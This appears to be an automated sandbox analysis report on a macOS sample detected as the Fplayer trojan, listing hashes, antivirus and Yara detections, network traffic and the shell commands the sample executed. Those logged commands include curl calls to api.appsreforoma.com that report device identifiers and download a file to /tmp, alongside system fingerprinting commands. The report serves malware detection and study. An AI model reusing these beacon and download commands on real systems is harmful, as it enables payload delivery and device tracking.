macOS Analysis Report
malw_sampl

Overview

General Information

Sample name: malw_sampl
Analysis ID: 1428695
MD5: d3e39930bca4c4b57f6e1f241f0a31c8
SHA1: ca71f4ee36076497b3989e61352da70fa4dfca8b
SHA256: 02cfb65e0e38ef9ce7e431c66cdc53be3392bfe9bbed4840e18a8b30a1fd8d4a
Infos:

Detection

Score: 68
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Machine Learning detection for sample
Executes commands using a shell command-line interpreter
Executes the "curl" command used to transfer data via the network (typically using HTTP/S)
Executes the "defaults" command used to read or modify user specific settings
Executes the "system_profiler" command used to collect detailed system hardware and software information
Mach-O contains sections with high entropy indicating compressed/encrypted content
Queries the macOS product version
Reads hardware related sysctl values
Reads the sysctl hardware model value (potentially used for VM-detection)
Reads the systems hostname
Yara signature match

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: malw_sampl Avira: detected
Multi AV Scanner detection for submitted file
Source: malw_sampl Virustotal: Detection: 44% Perma Link
Source: malw_sampl ReversingLabs: Detection: 34%
Machine Learning detection for sample
Source: malw_sampl Joe Sandbox ML: detected
Source: unknown HTTPS traffic detected: 151.101.131.6:443 -> 192.168.11.12:49347 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.131.6:443 -> 192.168.11.12:49350 version: TLS 1.2
Source: unknown HTTPS traffic detected: 17.248.193.16:443 -> 192.168.11.12:49349 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.131.6:443 -> 192.168.11.12:49352 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49388 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49389 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49391 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49392 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49390 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49393 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49399 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49401 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49402 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49403 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49404 version: TLS 1.2
Source: unknown TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown TCP traffic detected without corresponding DNS query: 17.248.193.17
Source: unknown TCP traffic detected without corresponding DNS query: 17.248.193.17
Source: unknown TCP traffic detected without corresponding DNS query: 17.248.193.17
Source: unknown TCP traffic detected without corresponding DNS query: 17.253.83.196
Source: unknown TCP traffic detected without corresponding DNS query: 17.253.83.196
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown DNS traffic detected: queries for: api.appsreforoma.com
Source: malw_sampl, 00000620.00000258.9.0000000111829000.0000000111852000.r--.sdmp String found in binary or memory: http://crl.apple.com/codesigning.crl0
Source: malw_sampl String found in binary or memory: http://crl.apple.com/root.crl0
Source: malw_sampl String found in binary or memory: http://crl.apple.com/timestamp.crl0
Source: malw_sampl String found in binary or memory: http://ocsp.apple.com/ocsp-devid010
Source: malw_sampl String found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
Source: malw_sampl, 00000620.00000258.9.0000000111829000.0000000111852000.r--.sdmp String found in binary or memory: http://www.apple.com/appleca/root.crl0
Source: malw_sampl String found in binary or memory: http://www.apple.com/appleca0
Source: malw_sampl, 00000620.00000258.9.0000000111829000.0000000111852000.r--.sdmp String found in binary or memory: http://www.apple.com/certificateauthority0
Source: malw_sampl String found in binary or memory: https://www.apple.com/appleca/0
Source: unknown Network traffic detected: HTTP traffic on port 49399 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49403
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49347
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49402
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49401
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49345
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49389
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49388
Source: unknown Network traffic detected: HTTP traffic on port 49393 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49391 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49388 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49401 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49403 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49352 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49327 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49350 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49399
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49352
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49350
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49393
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49392
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49391
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49390
Source: unknown Network traffic detected: HTTP traffic on port 49392 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49390 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49389 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49345 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49404 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49402 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49347 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49349 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49349
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49327
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49404
Source: unknown HTTPS traffic detected: 151.101.131.6:443 -> 192.168.11.12:49347 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.131.6:443 -> 192.168.11.12:49350 version: TLS 1.2
Source: unknown HTTPS traffic detected: 17.248.193.16:443 -> 192.168.11.12:49349 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.131.6:443 -> 192.168.11.12:49352 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49388 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49389 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49391 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49392 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49390 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49393 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49399 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49401 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49402 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49403 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49404 version: TLS 1.2

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: malw_sampl, type: SAMPLE Matched rule: MacOS_Trojan_Fplayer_1c1fae37 Author: unknown
Source: 00000620.00000258.1.00000001019db000.00000001019e1000.r-x.sdmp, type: MEMORY Matched rule: MacOS_Trojan_Fplayer_1c1fae37 Author: unknown
Source: 00000620.00000258.9.00000001019db000.00000001019e1000.r-x.sdmp, type: MEMORY Matched rule: MacOS_Trojan_Fplayer_1c1fae37 Author: unknown
Yara signature match
Source: malw_sampl, type: SAMPLE Matched rule: MacOS_Trojan_Fplayer_1c1fae37 reference_sample = f57e651088dee2236328d09705cef5e98461e97d1eb2150c372d00ca7c685725, os = macos, severity = x86, creation_date = 2021-10-05, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Trojan.Fplayer, fingerprint = abeb3cd51c0ff2e3173739c423778defb9a77bc49b30ea8442e6ec93a2d2d8d2, id = 1c1fae37-8d19-4129-a715-b78163f93fd2, last_modified = 2021-10-25
Source: 00000620.00000258.1.00000001019db000.00000001019e1000.r-x.sdmp, type: MEMORY Matched rule: MacOS_Trojan_Fplayer_1c1fae37 reference_sample = f57e651088dee2236328d09705cef5e98461e97d1eb2150c372d00ca7c685725, os = macos, severity = x86, creation_date = 2021-10-05, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Trojan.Fplayer, fingerprint = abeb3cd51c0ff2e3173739c423778defb9a77bc49b30ea8442e6ec93a2d2d8d2, id = 1c1fae37-8d19-4129-a715-b78163f93fd2, last_modified = 2021-10-25
Source: 00000620.00000258.9.00000001019db000.00000001019e1000.r-x.sdmp, type: MEMORY Matched rule: MacOS_Trojan_Fplayer_1c1fae37 reference_sample = f57e651088dee2236328d09705cef5e98461e97d1eb2150c372d00ca7c685725, os = macos, severity = x86, creation_date = 2021-10-05, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Trojan.Fplayer, fingerprint = abeb3cd51c0ff2e3173739c423778defb9a77bc49b30ea8442e6ec93a2d2d8d2, id = 1c1fae37-8d19-4129-a715-b78163f93fd2, last_modified = 2021-10-25
Source: classification engine Classification label: mal68.mac@0/4@4/0
Executes commands using a shell command-line interpreter
Source: /Users/bernard/Desktop/malw_sampl (PID: 620) Shell command executed: sh -c curl -L 'http://api.appsreforoma.com/slg?s=5642A000-E25E-4009-BD13-65DDB1840106&c=0' > /dev/null 2>&1 Jump to behavior
Source: /Users/bernard/Desktop/malw_sampl (PID: 620) Shell command executed: sh -c defaults read /System/Library/CoreServices/SystemVersion.plist ProductVersion Jump to behavior
Source: /Users/bernard/Desktop/malw_sampl (PID: 620) Shell command executed: sh -c system_profiler SPHardwareDataType | awk '/UUID/ { print $3 }' Jump to behavior
Source: /Users/bernard/Desktop/malw_sampl (PID: 620) Shell command executed: sh -c curl -L 'http://api.appsreforoma.com/slg?s=5642A000-E25E-4009-BD13-65DDB1840106&c=1' > /dev/null 2>&1 Jump to behavior
Source: /Users/bernard/Desktop/malw_sampl (PID: 620) Shell command executed: sh -c curl -f0L -o /tmp/5642A000-E25E-4009-BD13-65DDB1840106/CA5E6B96-0321-49D8-8AB7-67DA458B769A 'http://api.appsreforoma.com/sd/?c=AGFybQ==&u=6661EB4A-CDF0-4E32-8BDC-6B405B1B36B2&s=5642A000-E25E-4009-BD13-65DDB1840106&o=10.14.2&b=2600652593' > /dev/null 2>&1 Jump to behavior
Source: /Users/bernard/Desktop/malw_sampl (PID: 620) Shell command executed: sh -c curl -L 'http://api.appsreforoma.com/slg?s=5642A000-E25E-4009-BD13-65DDB1840106&c=3' > /dev/null 2>&1 Jump to behavior
Executes the "curl" command used to transfer data via the network (typically using HTTP/S)
Source: /bin/sh (PID: 622) Curl executable: /usr/bin/curl -> curl -L http://api.appsreforoma.com/slg?s=5642A000-E25E-4009-BD13-65DDB1840106&c=0 Jump to behavior
Source: /bin/sh (PID: 629) Curl executable: /usr/bin/curl -> curl -L http://api.appsreforoma.com/slg?s=5642A000-E25E-4009-BD13-65DDB1840106&c=1 Jump to behavior
Source: /bin/sh (PID: 631) Curl executable: /usr/bin/curl -> curl -f0L -o /tmp/5642A000-E25E-4009-BD13-65DDB1840106/CA5E6B96-0321-49D8-8AB7-67DA458B769A http://api.appsreforoma.com/sd/?c=AGFybQ==&u=6661EB4A-CDF0-4E32-8BDC-6B405B1B36B2&s=5642A000-E25E-4009-BD13-65DDB1840106&o=10.14.2&b=2600652593 Jump to behavior
Source: /bin/sh (PID: 633) Curl executable: /usr/bin/curl -> curl -L http://api.appsreforoma.com/slg?s=5642A000-E25E-4009-BD13-65DDB1840106&c=3 Jump to behavior
Source: /bin/sh (PID: 626) Awk executable: /usr/bin/awk -> awk /UUID/ { print $3 } Jump to behavior
Source: submission: malw_sampl Mach-O header: load_dylib -> /System/Library/Frameworks/ApplicationServices.framework/Versions/A/ApplicationServices
Source: /usr/libexec/firmwarecheckers/eficheck/eficheck (PID: 651) Random device file read: /dev/random Jump to behavior
Source: submission CodeSign Info: Executable=/Users/bernard/Desktop/malw_sampl
Mach-O contains sections with high entropy indicating compressed/encrypted content
Source: malw_sampl Submission file: section __const with 7.40356224 entropy (max. 8.0)
Reads the sysctl hardware model value (potentially used for VM-detection)
Source: /usr/sbin/system_profiler (PID: 627) Sysctl read request: hw.model (6.2) Jump to behavior
Queries the macOS product version
Source: /bin/sh (PID: 623) Defaults executable: /usr/bin/defaults defaults read /System/Library/CoreServices/SystemVersion.plist ProductVersion Jump to behavior
Reads hardware related sysctl values
Source: /usr/sbin/system_profiler (PID: 627) Sysctl read request: hw.cpu_freq (6.15) Jump to behavior
Source: /usr/sbin/system_profiler (PID: 627) Sysctl read request: hw.memsize (6.24) Jump to behavior
Reads the systems hostname
Source: /bin/sh (PID: 621) Sysctl requested: kern.hostname (1.10) Jump to behavior
Source: /bin/sh (PID: 623) Sysctl requested: kern.hostname (1.10) Jump to behavior
Source: /bin/sh (PID: 624) Sysctl requested: kern.hostname (1.10) Jump to behavior
Source: /bin/sh (PID: 628) Sysctl requested: kern.hostname (1.10) Jump to behavior
Source: /bin/sh (PID: 630) Sysctl requested: kern.hostname (1.10) Jump to behavior
Source: /bin/sh (PID: 632) Sysctl requested: kern.hostname (1.10) Jump to behavior
Executes the "defaults" command used to read or modify user specific settings
Source: /bin/sh (PID: 623) Defaults executable: /usr/bin/defaults defaults read /System/Library/CoreServices/SystemVersion.plist ProductVersion Jump to behavior
Executes the "system_profiler" command used to collect detailed system hardware and software information
Source: /bin/sh (PID: 625) System_profiler executable: /usr/sbin/system_profiler system_profiler SPHardwareDataType Jump to behavior
Source: /usr/sbin/system_profiler (PID: 625) System_profiler executable: /usr/sbin/system_profiler /usr/sbin/system_profiler -nospawn -xml SPHardwareDataType -detailLevel full Jump to behavior
cam-macmac-stand
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
192.229.211.108
 unknown United States
15133 EDGECASTUS false
151.101.131.6
 apis.apple.map.fastly.net United States
54113 FASTLYUS false
151.101.195.6
 unknown United States
54113 FASTLYUS false
151.101.67.6
 unknown United States
54113 FASTLYUS false

Contacted Domains

Name IP Active
apis.apple.map.fastly.net 151.101.131.6 true
gateway.fe2.apple-dns.net 17.248.193.16 true
api.appsreforoma.com unknown unknown
updates.cdn-apple.com unknown unknown